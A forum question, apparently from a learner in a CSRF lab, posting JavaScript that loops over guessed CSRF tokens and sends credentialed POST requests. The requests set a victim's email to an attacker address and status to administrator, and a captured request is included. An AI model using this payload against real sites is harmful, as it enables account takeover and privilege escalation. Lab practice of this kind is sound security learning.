Currently, I am engaged in a CSRF lab exercise with the challenge of iterating through over 20 tokens.
<script>
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.withCredentials = true;
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest.call();
};
</script>
In my code, I am using +token[i]+ to insert the token into the csrf parameter but upon inspecting the request(s) in Burp Suite, the token appears to be replaced with "undefined":
POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0
username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=
I'm seeking guidance on what I might be misunderstanding or doing incorrectly here. As I am relatively new to JavaScript, could it be that +token[i]+ is not the correct approach for this task?